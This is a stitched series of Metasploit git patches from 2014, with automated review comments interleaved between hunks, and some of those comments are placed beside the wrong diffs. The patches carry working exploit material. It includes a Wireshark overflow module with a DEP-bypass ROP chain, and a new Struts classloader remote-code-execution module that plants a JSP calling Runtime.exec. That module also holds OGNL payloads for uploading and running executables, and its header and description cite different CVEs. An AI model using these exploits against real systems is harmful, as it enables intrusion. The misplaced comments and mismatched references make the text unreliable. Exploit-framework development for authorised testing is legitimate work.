modules/exploits/unix/webapp/alienvault_sqli_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
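Review bot: The rewritten `cleanup` sends all three requests unconditionally, including when `exploit` stopped before `@cookie`, `@policy_id` or `@action_id` were set. When the token request fails, `token` is nil and `deletepolicy.php` is still called. The "Unable to remove" warnings then cannot tell an object that was never created from one that is still present on the tested system. Guarding the steps keeps the output accurate: `if @policy_id && token` around the policy removal and `if @action_id` around the action removal, with `ensure super` left as it is. The warnings would also be more useful if they named the ID that remains, e.g. `print_warning("#{peer} - Policy ID [ #{@policy_id} ] was not removed")`.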
diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb
index 43a4f1574e..e22c6b0cc6 100644
--- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb
+++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'Compat' =>
 {
- 'RequiredCmd' => 'generic perl pythonR',
+ 'RequiredCmd' => 'generic perl python',
 }
 },
 'Targets' =>
From 9a1b216fdb6c3e33580f39513ea228f6b0c4c188 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Mon, 28 Apr 2014 11:55:26 -0500
Subject: [PATCH 185/853] Move module to new location
---
 .../exploits/{unix/webapp => linux/http}/alienvault_sqli_exec.rb | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/exploits/{unix/webapp => linux/http}/alienvault_sqli_exec.rb (100%)
diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb
similarity index 100%
rename from modules/exploits/unix/webapp/alienvault_sqli_exec.rb
rename to modules/exploits/linux/http/alienvault_sqli_exec.rb
From a7e110be9e73cb78dea605faa50683b8572e1417 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Mon, 28 Apr 2014 19:36:45 +0100
Subject: [PATCH 186/853] Add a peer method, elaborate desc and prints
---
 .../auxiliary/scanner/ssh/ssh_enumusers.rb | 28 ++++++++++++++-----
 1 file changed, 21 insertions(+), 7 deletions(-)
diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
index 834494d700..811f067456 100644
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -17,11 +17,15 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. + On some versions of OpenSSH under some configurations, OpenSSH will prompt + for a password for an invalid user faster than for a valid user. }, 'Author' => ['kenkeiras'], 'References' => [ - ['CVE', '2006-5229'] + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] ], 'License' => MSF_LICENSE )) @@ -115,8 +119,18 @@ class Metasploit3 < Msf::Auxiliary ) end + # Because this isn't using the AuthBrute mixin, we don't have the + # usual peer method + def peer(rhost=nil) + "#{rhost}:#{rport} - SSH -" + end + def user_list - File.new(datastore['USER_FILE']).read.split + if File.readable? datastore['USER_FILE'] + File.new(datastore['USER_FILE']).read.split + else + raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}" + end end def attempt_user(user, ip) @@ -126,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) if attempt_num > 0 Rex.sleep(2 ** attempt_num) - print_debug "Retrying '#{user}' on '#{ip}' due to connection error" + print_debug "#{peer(ip)} Retrying '#{user}' due to connection error" end ret = check_user(ip, user, rport) 
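Review bot: In `user_list` (second hunk), `File.new(datastore['USER_FILE']).read.split` opens a handle that is never closed; `File.read(datastore['USER_FILE']).split` reads and closes in one call. If USER_FILE can be unset, `File.readable?` will raise TypeError on nil rather than the intended ArgumentError, so a preceding `raise ArgumentError, "USER_FILE is not set" if datastore['USER_FILE'].to_s.empty?` would keep the error type consistent. The new `peer(rhost=nil)` prints an empty host when called without an argument; the callers visible in this commit all pass `ip`, so the default can be dropped.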
@@ -139,17 +153,17 @@ class Metasploit3 < Msf::Auxiliary def show_result(attempt_result, user, ip) case attempt_result when :success - print_good "User '#{user}' found on #{ip}" + print_good "#{peer(ip)} User '#{user}' found" do_report(ip, user, rport) when :connection_error - print_error "User '#{user}' on #{ip} could not connect" + print_error "#{peer(ip)} User '#{user}' on could not connect" when :fail - print_debug "User '#{user}' not found on #{ip}" + print_debug "#{peer(ip)} User '#{user}' not found" end end def run_host(ip) - print_status "Starting scan on #{ip}" + print_status "#{peer(ip)} Starting scan" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end From a6edd94c7f3c0c22adcb90e7a5e3bd7b0743d3ac Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:47:15 +0100 Subject: [PATCH 187/853] Just fix refs and desc for release --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 834494d700..d919b82f1a 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -17,12 +17,16 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. - }, - 'Author' => ['kenkeiras'], - 'References' => - [ - ['CVE', '2006-5229'] - ], + On some versions of OpenSSH under some configurations, OpenSSH will prompt + for a password for an invalid user faster than for a valid user. + }, + 'Author' => ['kenkeiras'], + 'References' => + [ + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] + ], 'License' => MSF_LICENSE )) From a5baea1a8e3db69db5e5f7fe679a109451304843 Mon Sep 17 00:00:00 2001 
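Review bot: The rewritten `:connection_error` message in `show_result` keeps a stray word: `print_error "#{peer(ip)} User '#{user}' on could not connect"`. Dropping the leftover "on" gives `print_error "#{peer(ip)} User '#{user}' could not connect"`. A value of `attempt_result` other than the three symbols falls through the `case` without output; an `else` branch with `print_debug "#{peer(ip)} Unexpected result for '#{user}'"` would make that visible.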
From: Tod Beardsley Date: Mon, 28 Apr 2014 19:49:23 +0100 Subject: [PATCH 188/853] Touch up print_ statements --- modules/exploits/osx/local/nfs_mount_root.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index 7ab4242f50..b6c750493c 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Local 'Description' => %q{ This exploit leverage a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size - of a user-provided argument before copying it to the stack. As a result by - passing a large size, a local user can overwrite the stack with arbitrary + of a user-provided argument before copying it to the stack. As a result, by + passing a large size as an argument, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected. @@ -67,11 +67,11 @@ class Metasploit3 < Msf::Exploit::Local tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" - print_status "Writing temp file... #{tmpfile}" + print_status "Writing temp file as '#{tmpfile}'" write_file(tmpfile, exploit) register_file_for_cleanup(tmpfile) - print_status "Writing payload file... #{payloadfile}" + print_status "Writing payload file as '#{payloadfile}'" write_file(payloadfile, pload) register_file_for_cleanup(payloadfile) From 3bfdfb5cab60357b8c8d6d4dc1d58fe11b611bd1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:49:56 +0100 Subject: [PATCH 189/853] Grammar --- modules/exploits/osx/local/nfs_mount_root.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index b6c750493c..1a68c1d0ba 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit', 'Description' => %q{ - This exploit leverage a stack overflow vulnerability to escalate privileges. + This exploit leverages a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result, by passing a large size as an argument, a local user can overwrite the stack with arbitrary From 1b4fe90003736ec1e68fda719c8e60a1ee82872f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:51:38 +0100 Subject: [PATCH 190/853] Fix msftidy warnings on wireshark exploits --- .../fileformat/wireshark_mpeg_overflow.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index dc4146c897..0a44041cad 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow', + 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating an malicious file.) 
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Wesley Neelen', # Discovery vulnerability + 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2014-2299'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], - [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] + [ 'BID', '66066'] ], 'DefaultOptions' => { @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', - 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 + 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 }, 'Platform' => 'win', 'Targets' => @@ -49,11 +49,11 @@ class Metasploit3 < Msf::Exploit::Remote { 'OffSet' => 69732, 'OffSet2' => 70476, - 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) + 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } ], - [ 'WinXP SP2/SP3 English (bypass DEP)', + [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, 
@@ -75,25 +75,25 @@ class Metasploit3 < Msf::Exploit::Remote def create_rop_chain() # rop chain generated with mona.py - www.corelan.be - rop_gadgets = + rop_gadgets = [ 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] - 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] - 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx - 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] + 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] - 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop - 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets From 1c88dea7d605abafdd085c9a70965b96c434bd53 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 16:23:05 -0500 Subject: [PATCH 191/853] Exploitation also works with flash 13 --- modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 86be4d034d..adcefa77fe 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0', :mshtml_build => lambda { |ver| ver.to_i < 16843 }, - :flash => /^12\./ + :flash => /^1[23]\./ }, 'DefaultOptions' => { From fe3f7fd76ab466dee61451332842ab0cd13335e7 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 23:26:29 +0200 Subject: [PATCH 192/853] Obey to reviewer.. code fix --- .../gather/f5_bigip_cookie_disclosure.rb | 45 ++++++++----------- 1 file changed, 19 insertions(+), 26 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index a174f77928..536729a32d 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -52,10 +52,9 @@ class Metasploit3 < Msf::Auxiliary 'uri' => @uri }) id,value = nil - begin - # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + unless m.nil? id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value 
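Review bot: In the `get_cookie` hunk, `res.get_cookies` is called without checking `res`, so a request that gets no response would presumably raise NoMethodError instead of reporting that no cookie was found. Inside the new `unless m.nil?` block the two `(m.nil?) ? nil : …` ternaries can no longer take their nil branch. The lines can become `m = res && res.get_cookies.match(...)` with the pattern unchanged, followed by `return m[1], m[2] if m`. The method then returns nil when nothing matches, which the caller's `unless id` check in the next hunk already handles. The start of `get_cookie` is outside this hunk.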
@@ -63,37 +62,31 @@ class Metasploit3 < Msf::Auxiliary end def run - host_port = Array.new + host_port = [] @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") - id, value = get_cookie() - unless id - print_error "F5 SLB cookie not found" - return - end - print_status ("F5 cookie \"#{id}\" found") - host, port = cookie_decode(value) - host_port.push(host+":"+port) - print_status "Backend #{host}:#{port}" - i=1 # We already have done one request - until i == datastore['RETRY'] - id, value = get_cookie() + for i in 0...datastore['RETRY'] + id, value = get_cookie() # Get the cookie + # If the cookie is not found, stop process + unless id + print_error("F5 SLB cookie not found") + return + end + # Print the cookie name on the first request + if i == 0 + print_status("F5 cookie \"#{id}\" found") + end host, port = cookie_decode(value) unless host_port.include? (host+":"+port) host_port.push(host+":"+port) - print_status "Backend #{host}:#{port}" + print_status("Backend #{host}:#{port}") end - i += 1 - end - # Reporting found backend in database - backends = Array.new - host_port.each do |key| - backends.push (key) end + # Reporting found backends in database report_note( - :host => datastore['RHOST'], + :host => rhost, :type => "F5_Cookie_Backends", - :data => backends + :data => host_port ) end end From 70314494cad3bac71bb80f893d51a99f7abf82cc Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 23:33:01 +0200 Subject: [PATCH 193/853] test nil of port & host --- .../auxiliary/gather/f5_bigip_cookie_disclosure.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 536729a32d..b1b57bd1d3 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb 
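Review bot: The `return` inside the new loop in `run` fires on any iteration where the cookie is missing, so backends already collected in `host_port` never reach `report_note`. Using `break` there, and calling `report_note` only when `host_port` is not empty, keeps what was found. The loop reads more idiomatically as `datastore['RETRY'].times do |i|` than as `for i in 0...datastore['RETRY']`. In `host_port.include? (host+":"+port)` the space before the parenthesis should go: `host_port.include?(host+":"+port)`.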
@@ -37,12 +37,14 @@ class Metasploit3 < Msf::Auxiliary m = cookie_value.match(/(\d+)\.(\d+)\./) host = (m.nil?) ? nil : m[1] port = (m.nil?) ? nil : m[2] - port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s - byte1 = ("%08X" % host).slice(6..7).hex.to_s - byte2 = ("%08X" % host).slice(4..5).hex.to_s - byte3 = ("%08X" % host).slice(2..3).hex.to_s - byte4 = ("%08X" % host).slice(0..1).hex.to_s - host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + unless host.nil? && port.nil? + port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s + byte1 = ("%08X" % host).slice(6..7).hex.to_s + byte2 = ("%08X" % host).slice(4..5).hex.to_s + byte3 = ("%08X" % host).slice(2..3).hex.to_s + byte4 = ("%08X" % host).slice(0..1).hex.to_s + host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + end return host,port end From eb98ea2d3191e5562095e9d05c62315d69376967 Mon Sep 17 00:00:00 2001 From: nstarke Date: Mon, 28 Apr 2014 21:45:14 +0000 Subject: [PATCH 194/853] Large pass_file hangs login modules SeeRM #8704 When running a *_login module that contains a large PASS_FILE the module appears to hang while it is creating the combinations over such a large dataset. The solution proposed in the Redmine task requested that the user be alerted with some sort of progress feedback if the process takes an excessive amount of time. I have added a message that logs to the console that contains the number of pairs left to be constructed before the module will continue. The verbiage is fairly arbitrary and should probably be updated to something that might be more descriptive. Likewise, the sleep interval may need to be adjusted. --- lib/msf/core/auxiliary/auth_brute.rb | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb index dc70d93349..076e818f5f 100644 --- a/lib/msf/core/auxiliary/auth_brute.rb +++ b/lib/msf/core/auxiliary/auth_brute.rb 
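Review bot: The new guard `unless host.nil? && port.nil?` in `cookie_decode` skips the conversion only when both captures are nil; the intent is clearer as `unless host.nil? || port.nil?`, or as an early `return nil, nil unless m`. With the guard in place the method returns `nil, nil` for a value that does not match, and the caller shown in the previous commit builds `host+":"+port` without a check, so the failure presumably just moves there. The caller should skip the entry when `host` is nil. `("%08X" % host)` is also formatted four times and could be assigned once. The start of `cookie_decode` is outside this hunk.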
@@ -330,6 +330,23 @@ module Auxiliary::AuthBrute end creds = [ [], [], [], [] ] # userpass, pass, user, rest + remaining_pairs = combined_array.length # counter for our occasional output + status = Thread.new do + loop do + # Ruby's sleep function is not terribly accurate. + # Since all we are trying to do is let the user know + # that the process is still working and giving them + # an estimate as to how many pairs are left, + # precision may not be of the utmost necessity + sleep 100 + # Let the user know the combined pair list is still building + # and tell them how many pairs are left to process. + print_brute( + :level => :vstatus, + :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" + ) + end + end # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list. # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank -- # maybe (and it's often) they wanted a blank. One more credential won't kill @@ -344,7 +361,9 @@ module Auxiliary::AuthBrute else creds[3] << pair end + remaining_pairs -= 1 end + status.kill return creds[0] + creds[1] + creds[2] + creds[3] end From 60b9f855b4778ee7781ee090d7df7b42c23958f4 Mon Sep 17 00:00:00 2001 From: Rich Lundeen Date: Mon, 28 Apr 2014 18:44:02 -0700 Subject: [PATCH 195/853] Bug with HTTP POST requests (content type sent twice) --- modules/auxiliary/server/http_ntlmrelay.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index e5bfe4631b..dc41935c48 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb 
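Review bot: `status.kill` in the second hunk is reached only when the loop over the pairs completes; if that loop raises, the reporting thread started in the first hunk stays alive and keeps printing every 100 seconds. Wrapping the loop as `begin` … `ensure` `status.kill` `end` ties the thread's lifetime to the method. The thread is also created on every call, including for short lists where it can never print; starting it only above some list size would avoid that. The enclosing method starts outside these hunks.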
@@ -269,11 +269,6 @@ class Metasploit3 < Msf::Auxiliary theaders = ('Authorization: NTLM ' << hash << "\r\n" << "Connection: Keep-Alive\r\n" ) - if (method == 'POST') - theaders << 'Content-Length: ' << - (@finalputdata.length + 4).to_s()<< "\r\n" - end - # HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc if datastore['HTTP_HEADERFILE'] != nil print_status("Including extra headers from: #{datastore['HTTP_HEADERFILE']}") From 17a508af34c919bbc2abda4556bfbdc2c139e64a Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 29 Apr 2014 03:50:45 +0200 Subject: [PATCH 196/853] Add CVE-2014-0094 RCE for Struts 2 --- .../http/struts_code_exec_classloader.rb | 244 ++++++++++++++++++ 1 file changed, 244 insertions(+) create mode 100644 modules/exploits/multi/http/struts_code_exec_classloader.rb diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb new file mode 100644 index 0000000000..32331e4400 --- /dev/null +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb 
@@ -0,0 +1,244 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache Struts + versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows + for the use of parentheses which in turn allows it to interpret parameter values as + OGNL expressions during certain exception handling for mismatched data types of + properties which allows remote attackers to execute arbitrary Java code via a + crafted parameter. + }, + 'Author' => + [ + 'Meder Kydyraliev', # Vulnerability Discovery and PoC + 'Richard Hicks ', # Metasploit Module + 'mihi' #ARCH_JAVA support + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2011-3923'], + [ 'OSVDB', '78501'], + [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], + [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] + ], + 'Platform' => %w{ java linux win }, + 'Privileged' => true, + 'Targets' => + [ + ['Windows Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'windows' + } + ], + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + }, + ] + ], + 'DisclosureDate' => 'Oct 01 2011', + 'DefaultTarget' => 2)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), + OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the 
injection', "/hello_world/hello.action?INJECT"]), + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + ], self.class) + end + + def execute_command(cmd, opts = {}) +=begin + inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" + inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" + inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) + inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + uri.gsub!(/INJECT/,inject) # append the injection string + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + return resp #Used for check function. +=end + + inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + 
uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + + uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>" + uri = normalize_uri(uri) + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + + + return resp + + end + + def exploit +=begin + #Set up generic values. + @payload_exe = rand_text_alphanumeric(4+rand(4)) + pl_exe = generate_payload_exe + append = 'false' + #Now arch specific... + case target['Platform'] + when 'linux' + @payload_exe = "/tmp/#{@payload_exe}" + chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" + exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" + when 'java' + @payload_exe << ".jar" + pl_exe = payload.encoded_jar.pack + exec_cmd = "" + exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," + exec_cmd << "#q.setAccessible(true),#q.set(null,true)," + exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," + exec_cmd << "#q.setAccessible(true),#q.set(null,false)," + exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," + exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," + exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" + exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" + when 'windows' + @payload_exe = "./#{@payload_exe}.exe" + exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" + else + fail_with(Failure::NoTarget, 'Unsupported target platform!') + end + + #Now with all the arch specific stuff set, perform the upload. + #109 = length of command string plus the max length of append. 
